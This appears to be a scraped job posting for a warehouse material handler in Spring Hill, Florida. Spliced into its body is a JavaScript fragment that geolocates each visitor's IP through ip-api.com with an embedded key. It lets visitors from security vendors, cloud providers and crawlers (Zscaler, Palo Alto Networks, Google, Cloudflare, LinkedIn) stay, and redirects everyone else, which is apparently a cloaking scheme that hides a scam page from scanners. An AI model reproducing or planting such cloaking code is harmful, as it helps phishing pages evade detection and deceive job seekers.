Warehouse Material Handler (PT or FT)
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a reliable Warehouse Material Handler (PT or FT) in Spring Hill, Florida.
- Receive, unload, and inspect incoming shipments to ensure accuracy and quality.
- Pick, pack, and prepare orders for shipment, maintaining accuracy and efficiency.
- Operate warehouse equipment such as forklifts and pallet jacks safely and efficiently.
- Maintain organized storage areas, ensuring inventory is correctly labeled and stored.
- Conduct regular inventory counts and report discrepancies promptly.
- Follow safety protocols and maintain a clean, hazard-free workspace.
- Assist with general warehouse duties and collaborate with team members to meet daily goals.
Skills needed include attention to detail, strong organizational skills, physical stamina, and safety awareness.
Benefits include competitive pay, flexible scheduling, health insurance options, and opportunities for advancement. Join our team and contribute to a dynamic warehouse environment!